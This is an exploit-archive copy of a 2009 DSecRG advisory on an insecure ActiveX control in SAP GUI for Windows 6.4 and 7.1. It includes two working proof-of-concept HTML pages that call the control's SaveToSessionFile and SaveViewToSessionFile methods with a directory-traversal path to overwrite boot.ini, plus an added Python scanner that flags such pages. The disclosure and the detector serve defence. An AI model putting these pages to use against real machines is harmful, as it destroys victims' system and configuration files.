EnjoySAP 6.4, 7.1 File Overwrite

Author: Sh2kerr
Risk: Security Risk Unsorted
0day-ID: 0day-ID-9547
Category: remote exploits
Date added: 27-09-2009
Platform: unsorted
# Title: EnjoySAP 6.4, 7.1 File Overwrite
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sh2kerr
# Published: 2009-09-28
# Verified: yes


Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-044
 
 
Application:                    EnjoySAP, SAP GUI for Windows 6.4 and 7.1      
Versions Affected:              Tested on 7100.2.7.1038 PL 7
Vendor URL:                     http://SAP.com
Bugs:                           insecure method, file overwriting
Exploits:                       YES
Reported:                       02.07.2009
Vendor response:                02.07.2009
Date of Public Advisory:        22 naio
CVE-number:                    
Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
 
 
 
Description
***********
 
SAP GUI for Windows 7.1 and 6.4 contains the ActiveX component EAI WebViewer3D (file WebViewer3D.dll), Lib GUID: {AFBBE070-7340-11d2-AA6B-00E02924C34E},
 
which contains an insecure method that can overwrite any file on the system.
 
Details
*******
 
An attacker can construct an HTML page that calls one of the vulnerable functions, such as:
 
1) SaveToSessionFile
2) SaveViewToSessionFile
 
from the ActiveX component EAI WebViewer3D.
 
 
 
Example1:
 
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>
 
 
Example2:
 
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveViewToSessionFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>
 
 
 
 
For example, we can overwrite the boot.ini file or sapgui.ini, which contains all connections to SAP servers.
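
Added example (not part of the DSecRG advisory): a content-inspection check that a web or mail gateway could run over HTML, flagging pages that load the WebViewer3D CLSID through an <object> tag and call either method listed above. The CLSID and method names come from the advisory; the function names, result fields and sample pages are constructed for this example, and it assumes the control is instantiated via an <object> tag only.

```python
import re

# CLSID and method names come from the advisory; the rest is this example's own.
CLSID = "AFBBE070-7340-11D2-AA6B-00E02924C34E"
METHODS = "SaveToSessionFile|SaveViewToSessionFile"

TAG_RE = re.compile(r"<object\b[^>]*>", re.I)
CLASSID_RE = re.compile(r"classid\s*=\s*[\"']?clsid:\{?([0-9a-f-]{36})", re.I)
ID_RE = re.compile(r"\bid\s*=\s*[\"']?([\w$]+)", re.I)
ASSIGN_RE = re.compile(r"([\w$]+)\s*=\s*([\"'])(.*?)\2")
CALL_RE = re.compile(r"([\w$]+)\s*\.\s*(%s)\s*\(\s*([^)]*?)\s*\)" % METHODS, re.I)
# Relative traversal, drive-letter or rooted paths: the write lands outside any session directory.
ESCAPE_RE = re.compile(r"\.\.[\\/]|^[a-z]:|^[\\/]", re.I)


def scan_html(html):
    """Return one finding per call to a file-writing method on the WebViewer3D control."""
    ids = set()
    for tag in TAG_RE.findall(html):
        clsid, ident = CLASSID_RE.search(tag), ID_RE.search(tag)
        if clsid and ident and clsid.group(1).upper() == CLSID:
            ids.add(ident.group(1))
    # Simple `name = "literal"` assignments, so a variable argument can be resolved.
    literals = {name: value for name, _, value in ASSIGN_RE.findall(html)}
    findings = []
    for obj, method, arg in CALL_RE.findall(html):
        if obj not in ids:
            continue  # call on some other object, not the flagged control
        if arg and arg[0] in "\"'":
            path = arg[1:-1]
        else:
            path = literals.get(arg)  # None when the argument is not a known literal
        escapes = path is not None and bool(ESCAPE_RE.search(path))
        findings.append({"method": method, "path": path, "escapes": escapes})
    return findings


# Constructed sample pages (not captured traffic).
SAMPLE_HIT = """<html><body>
<object id=viewer classid="clsid:{afbbe070-7340-11d2-aa6b-00e02924c34e}"></object>
<script>
  target = "../../../../placeholder.txt"
  viewer.SaveViewToSessionFile(target)
</script></body></html>"""
SAMPLE_CLEAN = """<html><body>
<object id=viewer classid="clsid:{00000000-0000-0000-0000-000000000000}"></object>
<script>viewer.SaveToSessionFile("session1")</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("hit", SAMPLE_HIT), ("clean", SAMPLE_CLEAN)):
        print(name, scan_html(page))
```

A finding with "path" set to None means the argument could not be resolved statically; the call itself is still worth reviewing, since the advisory reports that the method writes to a caller-chosen path.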
 

